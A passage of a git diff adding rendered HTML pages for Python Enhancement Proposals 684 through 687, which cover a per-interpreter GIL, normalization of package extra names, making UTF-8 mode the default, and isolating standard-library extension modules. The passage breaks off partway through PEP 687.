Below, we mention the “main” interpreter several times. This refers to the interpreter created during runtime initialization, for which the initial PyThreadState corresponds to the process’s main thread. It has a number of unique responsibilities (e.g. handling signals), as well as a special role during runtime initialization/finalization. It is also usually (for now) the only interpreter. (Also see https://docs.python.org/3/c-api/init.html#sub-interpreter-support.)

+
+

PyInterpreterConfig.own_gil

+

If true (1) then the new interpreter will have its own “global” +interpreter lock. This means the new interpreter can run without +getting interrupted by other interpreters. This effectively unblocks +full use of multiple cores. That is the fundamental goal of this PEP.

+

If false (0) then the new interpreter will use the main +interpreter’s lock. This is the legacy (pre-3.12) behavior in CPython, +where all interpreters share a single GIL. Sharing the GIL like this +may be desirable when using extension modules that still depend +on the GIL for thread safety.

+

In PyInterpreterConfig_INIT, this will be true. +In PyInterpreterConfig_LEGACY_INIT, this will be false.

+

Also, to play it safe, for now we will not allow own_gil to be true +if a custom allocator was set during runtime init. Wrapping the allocator, +a la tracemalloc, will still be fine.

+
+
+

PyInterpreterConfig.strict_extensions_compat

+

PyInterpreterConfig.strict_extensions_compat is basically the initial value used for “PyInterpreterState.strict_extension_compat”.

+
+
+
+

Restricting Extension Modules

+

Extension modules have many of the same problems as the runtime when +state is stored in global variables. PEP 630 covers all the details +of what extensions must do to support isolation, and thus safely run in +multiple interpreters at once. This includes dealing with their globals.

+

If an extension implements multi-phase init (see PEP 489) it is +considered compatible with multiple interpreters. All other extensions +are considered incompatible. (See Extension Module Thread Safety +for more details about how a per-interpreter GIL may affect that +classification.)

+

If an incompatible extension is imported and the current +“PyInterpreterState.strict_extension_compat” value is true then the import +system will raise ImportError. (For false it simply doesn’t check.) +This will be done through +importlib._bootstrap_external.ExtensionFileLoader (really, through +_imp.create_dynamic(), _PyImport_LoadDynamicModuleWithSpec(), and +PyModule_FromDefAndSpec2()).

+

Such imports will never fail in the main interpreter (or in interpreters +created through Py_NewInterpreter()) since +“PyInterpreterState.strict_extension_compat” initializes to false in both +cases. Thus the legacy (pre-3.12) behavior is preserved.

+

We will work with popular extensions to help them support use in +multiple interpreters. This may involve adding to CPython’s public C-API, +which we will address on a case-by-case basis.

+
+

Extension Module Compatibility

+

As noted in Extension Modules, many extensions work fine in multiple +interpreters (and under a per-interpreter GIL) without needing any +changes. The import system will still fail if such a module doesn’t +explicitly indicate support. At first, not many extension modules +will, so this is a potential source of frustration.

+

We will address this by adding a context manager to temporarily disable +the check on multiple interpreter support: +importlib.util.allow_all_extensions(). More or less, it will modify +the current “PyInterpreterState.strict_extension_compat” value (e.g. through +a private sys function).

+
+
+

Extension Module Thread Safety

+

If a module supports use with multiple interpreters, that mostly implies +it will work even if those interpreters do not share the GIL. The one +caveat is where a module links against a library with internal global +state that isn’t thread-safe. (Even something as innocuous as a static +local variable as a temporary buffer can be a problem.) With a shared +GIL, that state is protected. Without one, such modules must wrap any +use of that state (e.g. through calls) with a lock.
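
For example, such a module might guard every call into the thread-unsafe library with a single lock. This is only a sketch; the library function and all names here are hypothetical:

#include <Python.h>
#include "pythread.h"

/* Hypothetical thread-unsafe library function. */
extern int some_thread_unsafe_call(void);

static PyThread_type_lock lib_lock;   /* allocated at module init with
                                         PyThread_allocate_lock() */

static PyObject *
wrapped_call(PyObject *self, PyObject *Py_UNUSED(args))
{
    PyThread_acquire_lock(lib_lock, WAIT_LOCK);
    int result = some_thread_unsafe_call();
    PyThread_release_lock(lib_lock);
    return PyLong_FromLong(result);
}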

+

Currently, it isn’t clear whether or not supports-multiple-interpreters +is sufficiently equivalent to supports-per-interpreter-gil, such that +we can avoid any special accommodations. This is still a point of +meaningful discussion and investigation. The practical distinction +between the two (in the Python community, e.g. PyPI) is not yet +understood well enough to settle the matter. Likewise, it isn’t clear +what we might be able to do to help extension maintainers mitigate +the problem (assuming it is one).

+

In the meantime, we must proceed as though the difference would be +large enough to cause problems for enough extension modules out there. +The solution we would apply is:

+
    +
  • add a PyModuleDef slot that indicates an extension can be imported +under a per-interpreter GIL (i.e. opt in)
  • +
  • add that slot as part of the definition of a “compatible” extension, +as discussed earlier
  • +
+

The downside is that not a single extension module will be able to take +advantage of the per-interpreter GIL without extra effort by the module +maintainer, regardless of how minor that effort. This compounds the +problem described in Extension Module Compatibility and the same +workaround applies. Ideally, we would determine that there isn’t enough +difference to matter.

+

If we do end up requiring an opt-in for imports under a per-interpreter +GIL, and later determine it isn’t necessary, then we can switch the +default at that point, make the old opt-in slot a noop, and add a new +PyModuleDef slot for explicitly opting out. In fact, it makes +sense to add that opt-out slot from the beginning.
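
For instance, an extension opting in might add such a slot to its module definition. The slot name below is hypothetical (this PEP does not fix its spelling), so it is shown commented out:

#include <Python.h>

static int
example_exec(PyObject *module)
{
    return 0;  /* module initialization succeeded */
}

static PyModuleDef_Slot example_slots[] = {
    {Py_mod_exec, example_exec},
    /* Hypothetical opt-in slot for per-interpreter GIL support:
       {Py_mod_per_interpreter_gil, (void *)1}, */
    {0, NULL},
};

static struct PyModuleDef example_module = {
    PyModuleDef_HEAD_INIT,
    .m_name = "example",
    .m_size = 0,                 /* multi-phase init, no module state */
    .m_slots = example_slots,
};

PyMODINIT_FUNC
PyInit_example(void)
{
    return PyModuleDef_Init(&example_module);
}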

+
+
+
+

Documentation

+
    +
  • C-API: the “Sub-interpreter support” section of Doc/c-api/init.rst +will detail the updated API
  • +
  • C-API: that section will explain about the consequences of +a per-interpreter GIL
  • +
  • importlib: the ExtensionFileLoader entry will note import +may fail in subinterpreters
  • +
  • importlib: there will be a new entry about +importlib.util.allow_all_extensions()
  • +
+
+
+
+

Impact

+
+

Backwards Compatibility

+

No behavior or APIs are intended to change due to this proposal, +with two exceptions:

+
    +
  • some extensions will fail to import in some subinterpreters +(see the next section)
  • +
  • “mem” and “object” allocators that are currently not thread-safe +may now be susceptible to data races when used in combination +with multiple interpreters
  • +
+

The existing C-API for managing interpreters will preserve its current +behavior, with new behavior exposed through new API. No other API +or runtime behavior is meant to change, including compatibility with +the stable ABI.

+

See Objects Exposed in the C-API below for related discussion.

+
+

Extension Modules

+

Currently the most common usage of Python, by far, is with the main +interpreter running by itself. This proposal has zero impact on +extension modules in that scenario. Likewise, for better or worse, +there is no change in behavior under multiple interpreters created +using the existing Py_NewInterpreter().

+

Keep in mind that some extensions already break when used in multiple +interpreters, due to keeping module state in global variables (or +due to the internal state of linked libraries). They +may crash or, worse, experience inconsistent behavior. That was part +of the motivation for PEP 630 and friends, so this is not a new +situation nor a consequence of this proposal.

+

In contrast, when the proposed API is used to +create multiple interpreters, with the appropriate settings, +the behavior will change for incompatible extensions. In that case, +importing such an extension will fail (outside the main interpreter), +as explained in Restricting Extension Modules. For extensions that +already break in multiple interpreters, this will be an improvement.

+

Additionally, some extension modules link against libraries with +thread-unsafe internal global state. +(See Extension Module Thread Safety.) +Such modules will have to start wrapping any direct or indirect use +of that state in a lock. This is the key difference from other modules +that also implement multi-phase init and thus indicate support for +multiple interpreters (i.e. isolation).

+

Now we get to the break in compatibility mentioned above. Some +extensions are safe under multiple interpreters (and a per-interpreter +GIL), even though they haven’t indicated that. Unfortunately, there is +no reliable way for the import system to infer that such an extension +is safe, so importing them will still fail. This case is addressed +in Extension Module Compatibility above.

+
+
+
+

Extension Module Maintainers

+

One related consideration is that a per-interpreter GIL will likely +drive increased use of multiple interpreters, particularly if PEP 554 +is accepted. Some maintainers of large extension modules have expressed +concern about the increased burden they anticipate due to increased +use of multiple interpreters.

+

Specifically, enabling support for multiple interpreters will require +substantial work for some extension modules (albeit likely not many). +To add that support, the maintainer(s) of such a module (often +volunteers) would have to set aside their normal priorities and +interests to focus on compatibility (see PEP 630).

+

Of course, extension maintainers are free to not add support for use +in multiple interpreters. However, users will increasingly demand +such support, especially if the feature grows in popularity.

+

Either way, the situation can be stressful for maintainers of such +extensions, particularly when they are doing the work in their spare +time. The concerns they have expressed are understandable, and we address +the partial solution in the Restricting Extension Modules and +Extension Module Compatibility sections.

+
+
+

Alternate Python Implementations

+

Other Python implementations are not required to provide support for multiple interpreters in the same process (though some do already).

+
+
+

Security Implications

+

There is no known impact to security with this proposal.

+
+
+

Maintainability

+

On the one hand, this proposal has already motivated a number of +improvements that make CPython more maintainable. That is expected +to continue. On the other hand, the underlying work has already +exposed various pre-existing defects in the runtime that have had +to be fixed. That is also expected to continue as multiple interpreters +receive more use. Otherwise, there shouldn’t be a significant impact +on maintainability, so the net effect should be positive.

+
+
+

Performance

+

The work to consolidate globals has already provided a number of improvements to CPython’s performance, both speeding it up and using less memory, and this should continue. The performance benefits of a per-interpreter GIL specifically have not been explored. At the very least, it is not expected to make CPython slower (as long as interpreters are sufficiently isolated). And, obviously, it enables a variety of multi-core parallelism in Python code.

+
+
+
+

How to Teach This

+

Unlike PEP 554, this is an advanced feature meant for a narrow set +of users of the C-API. There is no expectation that the specifics of +the API nor its direct application will be taught.

+

That said, if it were taught then it would boil down to the following:

+
+
In addition to Py_NewInterpreter(), you can use +Py_NewInterpreterFromConfig() to create an interpreter. +The config you pass it indicates how you want that +interpreter to behave.
+

Furthermore, the maintainers of any extension modules that create isolated interpreters will likely need to explain the consequences of a per-interpreter GIL to their users. The first thing to explain is what PEP 554 teaches about the concurrency model that isolated interpreters enable. That leads into the point that Python software written using that concurrency model can then take advantage of multi-core parallelism, which is currently prevented by the GIL.

+
+
+

Reference Implementation

+

<TBD>

+
+
+

Open Issues

+
    +
  • Are we okay to require “mem” and “object” allocators to be thread-safe?
  • +
  • How would a per-interpreter tracemalloc module relate to global allocators?
  • +
  • Would the faulthandler module be limited to the main interpreter +(like the signal module) or would we leak that global state between +interpreters (protected by a granular lock)?
  • +
  • Split out an informational PEP with all the relevant info, +based on the “Consolidating Runtime Global State” section?
  • +
  • How likely is it that a module works under multiple interpreters +(isolation) but doesn’t work under a per-interpreter GIL? +(See Extension Module Thread Safety.)
  • +
  • If it is likely enough, what can we do to help extension maintainers +mitigate the problem and enjoy use under a per-interpreter GIL?
  • +
  • What would be a better (scarier-sounding) name +for allow_all_extensions?
  • +
+
+
+

Deferred Functionality

+
    +
  • PyInterpreterConfig option to always run the interpreter in a new thread
  • +
  • PyInterpreterConfig option to assign a “main” thread to the interpreter +and only run in that thread
  • +
+
+
+

Rejected Ideas

+

<TBD>

+
+
+

Extra Context

+
+

Sharing Global Objects

+

We are sharing some global objects between interpreters. +This is an implementation detail and relates more to +globals consolidation +than to this proposal, but it is a significant enough detail +to explain here.

+

The alternative is to share no objects between interpreters, ever. +To accomplish that, we’d have to sort out the fate of all our static +types, as well as deal with compatibility issues for the many objects +exposed in the public C-API.

+

That approach introduces a meaningful amount of extra complexity +and higher risk, though prototyping has demonstrated valid solutions. +Also, it would likely result in a performance penalty.

+

Immortal objects allow us to +share the otherwise immutable global objects. That way we avoid +the extra costs.

+
+

Objects Exposed in the C-API

+

The C-API (including the limited API) exposes all the builtin types, +including the builtin exceptions, as well as the builtin singletons. +The exceptions are exposed as PyObject * but the rest are exposed +as the static values rather than pointers. This was one of the few +non-trivial problems we had to solve for per-interpreter GIL.

+

With immortal objects this is a non-issue.

+
+
+
+

Consolidating Runtime Global State

+

As noted in CPython Runtime State above, there is an active effort +(separate from this PEP) to consolidate CPython’s global state into the +_PyRuntimeState struct. Nearly all the work involves moving that +state from global variables. The project is particularly relevant to +this proposal, so below is some extra detail.

+
+

Benefits to Consolidation

+

Consolidating the globals has a variety of benefits:

+
    +
  • greatly reduces the number of C globals (best practice for C code)
  • +
  • the move draws attention to runtime state that is unstable or broken
  • +
  • encourages more consistency in how runtime state is used
  • +
  • makes it easier to discover/identify CPython’s runtime state
  • +
  • makes it easier to statically allocate runtime state in a consistent way
  • +
  • better memory locality for runtime state
  • +
+

Furthermore all the benefits listed in Indirect Benefits above also +apply here, and the same projects listed there benefit.

+
+
+

Scale of Work

+

The number of global variables to be moved is large enough to matter, +but most are Python objects that can be dealt with in large groups +(like Py_IDENTIFIER). In nearly all cases, moving these globals +to the interpreter is highly mechanical. That doesn’t require +cleverness but instead requires someone to put in the time.

+
+
+

State To Be Moved

+

The remaining global variables can be categorized as follows:

+
    +
  • global objects
      +
    • static types (incl. exception types)
    • +
    • non-static types (incl. heap types, structseq types)
    • +
    • singletons (static)
    • +
    • singletons (initialized once)
    • +
    • cached objects
    • +
    +
  • +
  • non-objects
      +
    • will not (or unlikely to) change after init
    • +
    • only used in the main thread
    • +
    • initialized lazily
    • +
    • pre-allocated buffers
    • +
    • state
    • +
    +
  • +
+

Those globals are spread between the core runtime, the builtin modules, +and the stdlib extension modules.

+

For a breakdown of the remaining globals, run:

+
./python Tools/c-analyzer/table-file.py Tools/c-analyzer/cpython/globals-to-fix.tsv
+
+
+
+
+

Already Completed Work

+

As mentioned, this work has been going on for many years. Here are some +of the things that have already been done:

+
    +
  • cleanup of runtime initialization (see PEP 432 / PEP 587)
  • +
  • extension module isolation machinery (see PEP 384 / PEP 3121 / PEP 489)
  • +
  • isolation for many builtin modules
  • +
  • isolation for many stdlib extension modules
  • +
  • addition of _PyRuntimeState
  • +
  • no more _Py_IDENTIFIER()
  • +
  • statically allocated:
      +
    • empty string
    • +
    • string literals
    • +
    • identifiers
    • +
    • latin-1 strings
    • +
    • length-1 bytes
    • +
    • empty tuple
    • +
    +
  • +
+
+
+

Tooling

+

As already indicated, there are several tools to help identify the +globals and reason about them.

+
    +
  • Tools/c-analyzer/cpython/globals-to-fix.tsv - the list of remaining globals
  • +
  • Tools/c-analyzer/c-analyzer.py
      +
    • analyze - identify all the globals
    • +
    • check - fail if there are any unsupported globals that aren’t ignored
    • +
    +
  • +
  • Tools/c-analyzer/table-file.py - summarize the known globals
  • +
+

Also, the check for unsupported globals is incorporated into CI so that +no new globals are accidentally added.

+
+
+

Global Objects

+

Global objects that are safe to be shared (without a GIL) between +interpreters can stay on _PyRuntimeState. Not only must the object +be effectively immutable (e.g. singletons, strings), but not even the +refcount can change for it to be safe. Immortality (PEP 683) +provides that. (The alternative is that no objects are shared, which +adds significant complexity to the solution, particularly for the +objects exposed in the public C-API.)

+

Builtin static types are a special case of global objects that will be +shared. They are effectively immutable except for one part: +__subclasses__ (AKA tp_subclasses). We expect that nothing +else on a builtin type will change, even the content +of __dict__ (AKA tp_dict).

+

__subclasses__ for the builtin types will be dealt with by making +it a getter that does a lookup on the current PyInterpreterState +for that type.

+
+
+
+
+

References

+

Related:

+
    +
  • PEP 384 “Defining a Stable ABI”
  • +
  • PEP 432 “Restructuring the CPython startup sequence”
  • +
  • PEP 489 “Multi-phase extension module initialization”
  • +
  • PEP 554 “Multiple Interpreters in the Stdlib”
  • +
  • PEP 573 “Module State Access from C Extension Methods”
  • +
  • PEP 587 “Python Initialization Configuration”
  • +
  • PEP 630 “Isolating Extension Modules”
  • +
  • PEP 683 “Immortal Objects, Using a Fixed Refcount”
  • +
  • PEP 3121 “Extension Module Initialization and Finalization”
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0684.rst

+

Last modified: 2024-06-04 17:05:36 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0685/index.html new file mode 100644 index 00000000000..3497fe8cab0 --- /dev/null +++ b/pep-0685/index.html @@ -0,0 +1,330 @@ + PEP 685 – Comparison of extra names for optional distribution dependencies | peps.python.org
+
+


+ + +
+
+
+

PEP 685 – Comparison of extra names for optional distribution dependencies

+
+
Author:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
08-Mar-2022
+
Post-History:
+
08-Mar-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical specifications are maintained on the PyPA specs page.

+


+

See the PyPA specification update process for how to propose changes.

+
+
+

Abstract

+

This PEP specifies how to normalize distribution extra +names when performing comparisons. +This prevents tools from either failing to find an extra name, or +accidentally matching against an unexpected name.

+
+
+

Motivation

+

The Provides-Extra core metadata specification states that an extra’s +name “must be a valid Python identifier”. +PEP 508 specifies that the value of an extra marker may contain a +letter, digit, or any one of ., -, or _ after the initial character. +There is no other PyPA specification +which outlines how extra names should be written or normalized for comparison. +Due to the amount of packaging-related code in existence, +it is important to evaluate current practices by the community and +standardize on one that doesn’t break most existing code, while being +something tool authors can agree to following.

+

The issue of there being no consistent standard was brought forward by an +initial discussion +noting that the extra adhoc-ssl was not considered equal to the name +adhoc_ssl by pip 22.

+
+
+

Rationale

+

PEP 503 specifies how to normalize distribution names:

+
re.sub(r"[-_.]+", "-", name).lower()
+
+
+

This collapses any run of the characters -, _ and . down to a single -. For example, ---, ., and __ all get converted to just -. This does not produce a valid Python identifier, per the core metadata 2.2 specification for extra names.

+

Setuptools 60 performs normalization +via:

+
re.sub(r'[^A-Za-z0-9-.]+', '_', name).lower()
+
+
+

The use of an underscore/_ differs from PEP 503’s use of a hyphen/-, +and it also normalizes characters outside of those allowed by PEP 508. +Runs of . and -, unlike PEP 503, do not get normalized to one _, +e.g. .. stays the same. To note, this is inconsistent with this function’s +docstring, which does specify that all non-alphanumeric characters +(which would include - and .) are normalized and collapsed.

+

For pip 22, its +“extra normalisation behaviour is quite convoluted and erratic” [pip-erratic] +and so its use is not considered.

+
+
+
[pip-erratic]
+
Tzu-ping Chung on Python Discourse: https://discuss.python.org/t/7614/10
+
+
+
+

Specification

+

When comparing extra names, tools MUST normalize the names being compared +using the semantics outlined in PEP 503 +for names:

+
re.sub(r"[-_.]+", "-", name).lower()
+
+
+

The core metadata specification will be updated such that the allowed +names for Provides-Extra matches what PEP 508 specifies for names. +This will bring extra naming in line with that of the Name field. +Because this changes what is considered valid, it will lead to a core +metadata version increase to 2.3.

+

For tools writing core metadata, +they MUST write out extra names in their normalized form. +This applies to the Provides-Extra field and the +extra marker when used in the Requires-Dist field.

+

Tools generating metadata MUST raise an error if a user specified +two or more extra names which would normalize to the same name. +Tools generating metadata MUST raise an error if an invalid extra +name is provided as appropriate for the specified core metadata version. +If a project’s metadata specifies an older core metadata version and +the name would be invalid with newer core metadata versions, +tools reading that metadata SHOULD warn the user. +Tools SHOULD warn users when an invalid extra name is read and SHOULD +ignore the name to avoid ambiguity. +Tools MAY raise an error instead of a warning when reading an +invalid name, if they so desire.

+
+
+

Backwards Compatibility

+

Moving to PEP 503 normalization and PEP 508 name acceptance +allows for all preexisting, valid names to continue to be valid.

+

Based on research looking at a collection of wheels on PyPI [pypi-results], +the risk of extra name clashes is limited to 73 instances when considering +all extras names on PyPI, valid or not (not just those within a single package) +while only looking at valid names leads to only 3 clashes:

+
    +
  • dev-test: dev_test, dev-test, dev.test
  • +
  • dev-lint: dev-lint, dev.lint, dev_lint
  • +
  • apache-beam: apache-beam, apache.beam
  • +
+

By requiring tools writing core metadata to only record the normalized name, +the issue of preexisting, invalid extra names should diminish over time.

+
+
+
[pypi-results]
+
Paul Moore on Python Discourse: https://discuss.python.org/t/14141/17
+
+
+
+

Security Implications

+

It is possible that for a distribution that has conflicting extra names, a +tool ends up installing dependencies that somehow weaken the security +of the system. +This is only hypothetical and if it were to occur, +it would probably be more of a security concern for the distributions +specifying such extras names rather than the distribution that pulled +them in together.

+
+
+

How to Teach This

+

This should be transparent to users on a day-to-day basis. +It will be up to tools to educate/stop users when they select extra +names which conflict.

+
+
+

Reference Implementation

+

No reference implementation is provided aside from the code above, +but the expectation is the packaging project will provide a +function in its packaging.utils module that will implement extra name +normalization. +It will also implement extra name comparisons appropriately. +Finally, if the project ever gains the ability to write out metadata, +it will also implement this PEP.

+
+
+

Transition Plan

+

There is a risk that a build tool will produce core metadata conforming to version 2.3 and thus this PEP but which is consumed by a tool that is unaware of this PEP (if that tool chooses to attempt to read a core metadata version it does not directly support). In such a case there is a chance that a user may specify an extra using a non-normalized name which worked previously but which fails now.

+

As such, consumers of this PEP should be prioritized more than +producers so that users can be notified that they are specifying extra +names which are not normalized (and thus may break in the future).

+
+
+

Rejected Ideas

+
+

Using setuptools 60’s normalization

+

Initially, this PEP proposed using setuptools safe_extra() for normalization +to try to minimize backwards-compatibility issues. +However, after checking various wheels on PyPI, +it became clear that standardizing all naming on PEP 508 and +PEP 503 semantics was easier and better long-term, +while causing minimal backwards compatibility issues.

+
+
+
+

Open Issues

+

N/A

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0685.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0686/index.html new file mode 100644 index 00000000000..153e7d860d2 --- /dev/null +++ b/pep-0686/index.html @@ -0,0 +1,298 @@ + PEP 686 – Make UTF-8 mode default | peps.python.org
+
+


+ + +
+
+
+

PEP 686 – Make UTF-8 mode default

+
+
Author:
+
Inada Naoki <songofacandy at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Created:
+
18-Mar-2022
+
Python-Version:
+
3.15
+
Post-History:
+
18-Mar-2022, +31-Mar-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+

This PEP proposes enabling UTF-8 mode by default.

+

With this change, Python consistently uses UTF-8 for default encoding of +files, stdio, and pipes.

+
+
+

Motivation

+

UTF-8 has become the de facto standard text encoding:

+
    +
  • The default encoding of Python source files is UTF-8.
  • +
  • JSON, TOML, YAML use UTF-8.
  • +
  • Most text editors, including Visual Studio Code and Windows Notepad use +UTF-8 by default.
  • +
  • Most websites and text data on the internet use UTF-8.
  • +
  • Many other popular programming languages and runtimes, including Node.js, Go, Rust, and Java, use UTF-8 by default.
  • +
+

Changing the default encoding to UTF-8 makes it easier for Python to +interoperate with them.

+

Additionally, many Python developers using Unix forget that the default encoding is platform dependent. They forget to specify encoding="utf-8" when they read text files encoded in UTF-8 (e.g. JSON, TOML, Markdown, and Python source files). This inconsistent default encoding causes many bugs.

+
+
+

Specification

+
+

Enable UTF-8 mode by default

+

Python will enable UTF-8 mode by default from Python 3.15.

+

Users can still disable UTF-8 mode by setting PYTHONUTF8=0 or +-X utf8=0.

+
+
+

locale.getencoding()

+

Since UTF-8 mode affects locale.getpreferredencoding(False), we need an API to get the locale encoding regardless of UTF-8 mode.

+

locale.getencoding() will be added for this purpose. It also returns the locale encoding, but it ignores UTF-8 mode.

+

When the warn_default_encoding option is specified, locale.getpreferredencoding() will emit an EncodingWarning, like open() (see also PEP 597).

+

This API was added in Python 3.11.
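
A sketch of the difference on a Windows machine whose locale encoding is cp1252, running with UTF-8 mode enabled (the printed values are illustrative):

+
import locale
+
+# Affected by UTF-8 mode: reports UTF-8 when the mode is enabled.
+print(locale.getpreferredencoding(False))  # e.g. "utf-8"
+
+# Ignores UTF-8 mode: always reports the real locale encoding.
+print(locale.getencoding())                # e.g. "cp1252"
+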

+
+
+

Fixing encoding="locale" option

+

PEP 597 added the encoding="locale" option to the TextIOWrapper. +This option is used to specify the locale encoding explicitly. +TextIOWrapper should use locale encoding when the option is specified, +regardless of default text encoding.

+

But for now, TextIOWrapper uses "UTF-8" in UTF-8 mode even if encoding="locale" is specified. This behavior is inconsistent with the motivation of PEP 597; it exists because making UTF-8 mode the default was not anticipated when PEP 597 was designed.

+

This inconsistency should be fixed before making UTF-8 mode the default: TextIOWrapper should use the locale encoding when encoding="locale" is passed, even in UTF-8 mode.

+

This issue was fixed in Python 3.11.
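
With that fix in place, encoding="locale" is the way to opt a single stream back into the locale encoding even when UTF-8 mode is on (a sketch; encoding="locale" requires Python 3.10+, and the file name is illustrative):

+
# Default text encoding: UTF-8 when UTF-8 mode is enabled.
+with open("report.txt", "w") as f:
+    f.write("café\n")
+
+# Explicitly the locale encoding, regardless of UTF-8 mode
+# (behavior fixed in Python 3.11).
+with open("report.txt", "a", encoding="locale") as f:
+    f.write("café\n")
+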

+
+
+
+

Backward Compatibility

+

Most Unix systems use a UTF-8 locale, and Python already enables UTF-8 mode when the locale is C or POSIX. So this change mostly affects Windows users.

+

When a Python program depends on the default encoding, this change may cause +UnicodeError, mojibake, or even silent data corruption. +So this change should be announced loudly.

+

The following guideline can be used to fix this backward compatibility issue:

+
    +
  1. Disable UTF-8 mode.
  2. Use EncodingWarning (PEP 597) to find every place UTF-8 mode affects.
      +
    • If the encoding option is omitted, consider using encoding="utf-8" or encoding="locale".
    • If locale.getpreferredencoding() is used, consider using "utf-8" or locale.getencoding().
    +
  3. Test the application with UTF-8 mode.
+
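
For step 2, EncodingWarning can be enabled with the -X warn_default_encoding command line option or the PYTHONWARNDEFAULTENCODING environment variable (both added by PEP 597). A sketch of what this looks like (the script name and line number are illustrative):

+
# Run as: python -X warn_default_encoding app.py
+#
+# Each call site relying on the default encoding is reported, roughly:
+#   app.py:3: EncodingWarning: 'encoding' argument not specified
+
+with open("data.txt") as f:   # flagged: encoding omitted
+    text = f.read()
+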
+
+

Preceding examples

+
    +
  • Ruby changed the default external_encoding +to UTF-8 on Windows in Ruby 3.0 (2020).
  • +
  • Java changed the default text encoding to UTF-8 in JDK 18 (2022).
  • +
+

Both Ruby and Java provide an option for backward compatibility. Neither provides a warning, like PEP 597's EncodingWarning in Python, for use of the default encoding.

+
+
+

Rejected Alternative

+
+

Deprecate implicit encoding

+

Deprecating the use of the default encoding was considered.

+

But there are many cases in which the default encoding is used only for reading/writing ASCII text. Additionally, such warnings are not useful for non-cross-platform applications running on Unix.

+

So forcing users to specify the encoding everywhere is too painful. Emitting a lot of DeprecationWarnings would lead users to ignore warnings.

+

PEP 387 requires adding a warning for backward-incompatible changes, but it does not require using DeprecationWarning. So using the optional EncodingWarning does not violate PEP 387.

+

Java also rejected this idea in JEP 400.

+
+
+

Use PYTHONIOENCODING for PIPEs

+

To ease the backward compatibility issue, using PYTHONIOENCODING as the default encoding of pipes in the subprocess module was considered.

+

With this idea, users could keep a legacy encoding for subprocess.Popen(text=True) even in UTF-8 mode.

+

But this idea would complicate the notion of a "default encoding", and it is itself backward incompatible.

+

So this idea was rejected. Users can disable UTF-8 mode until they replace text=True with encoding="utf-8" or encoding="locale".
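
A sketch of that migration for subprocess callers (the command shown is illustrative):

+
import subprocess
+
+# Before: depends on the default encoding, which changes under UTF-8 mode.
+out = subprocess.run(["git", "status"], capture_output=True, text=True)
+
+# After: pin the pipe encoding explicitly.
+out = subprocess.run(["git", "status"], capture_output=True, encoding="utf-8")
+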

+
+
+
+

How to teach this

+

For new users, this change reduces the amount that needs to be taught. Users do not need to learn about text encoding in their first year; they can learn it when they need to work with non-UTF-8 text files.

+

For existing users, see the Backward compatibility section.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0686.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0687/index.html b/pep-0687/index.html new file mode 100644 index 00000000000..12539459f77 --- /dev/null +++ b/pep-0687/index.html @@ -0,0 +1,314 @@ + PEP 687 – Isolating modules in the standard library | peps.python.org +
+
+


+ + +
+
+
+

PEP 687 – Isolating modules in the standard library

+
+
Author:
+
Erlend Egeberg Aasland <erlend at python.org>, Petr Viktorin <encukou at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Requires:
+
489, 573, 630
+
Created:
+
04-Apr-2022
+
Python-Version:
+
3.12
+
Post-History:
+
04-Apr-2022, +11-Apr-2022
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+

Extensions in the standard library will be converted to multi-phase +initialization (PEP 489) and where possible, all state will be +stored on module objects rather than in process-global variables.

+
+
+

Note on Backdating

+

Much of this proposal has already been implemented. +We submit this PEP to explain the changes, seek consensus on +whether they are good, propose the remaining changes, +and set best practices for new modules.

+
+
+

Motivation & Rationale

+

The informational PEP 630 describes the background, motivation, rationale, +implications and implementation notes of the proposed changes as they apply +generally to any extension module (not just the standard library).

+

It is an integral part of this proposal. Read it first.

+

This PEP discusses specifics of the standard library.

+
+
+

Specification

+

The body of PEP 630 will be converted to a HOWTO in the Python +documentation, and that PEP will be retired (marked Final).

+

All extension modules in the standard library will be converted to multi-phase +initialization introduced in PEP 489.

+

All stdlib extension modules will be isolated. That is:

+
    +
  • Types, functions and other objects defined by the module will either be +immutable, or not shared with other module instances.
  • +
  • State specific to the module will not be shared with other module instances, +unless it represents global state.

    For example, _csv.field_size_limit will get/set a module-specific +number. On the other hand, functions like readline.get_history_item or +os.getpid will continue to work with state that is process-global +(external to the module, and possibly shared across other libraries, including +non-Python ones).

    +
  • +
+
+

Conversion to heap types

+

Static types that do not need module state access, and have no other reason to +be converted, should stay static.

+

Types whose methods need access to their module instance will be converted +to heap types following PEP 630, with the following considerations:

+
    +
  • All standard library types that used to be static types should remain immutable. Heap types must be defined with the Py_TPFLAGS_IMMUTABLETYPE flag to retain immutability. See bpo-43908.

    Tests should ensure TypeError is raised when trying to set a new attribute on an immutable type.

    +
  • +
  • A static type with tp_new = NULL does not have a public constructor, but +heap types inherit the constructor from the base class. Make sure types that +previously were impossible to instantiate retain that feature; use +Py_TPFLAGS_DISALLOW_INSTANTIATION. Add tests using +test.support.check_disallow_instantiation(). See +bpo-43916.
  • +
  • Converted heap types may unintentionally become serializable +(pickle-able). Test that calling pickle.dumps has the same result +before and after conversion, and if the test fails, add a __reduce__ +method that raises TypeError. See PR-21002 +for an example.
  • +
+

These issues will be added to the Devguide to help any future conversions.
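
A minimal sketch of the kind of guard tests described above; the builtin types used here are stand-ins purely for illustration:

+
import pickle
+import unittest
+from test.support import check_disallow_instantiation
+
+class ConversionGuards(unittest.TestCase):
+    def test_immutable_type(self):
+        # Immutable heap types must reject new attributes.
+        with self.assertRaises(TypeError):
+            memoryview.spam = 1  # stand-in for the converted type
+
+    def test_disallow_instantiation(self):
+        # Types with tp_new = NULL must stay non-instantiable.
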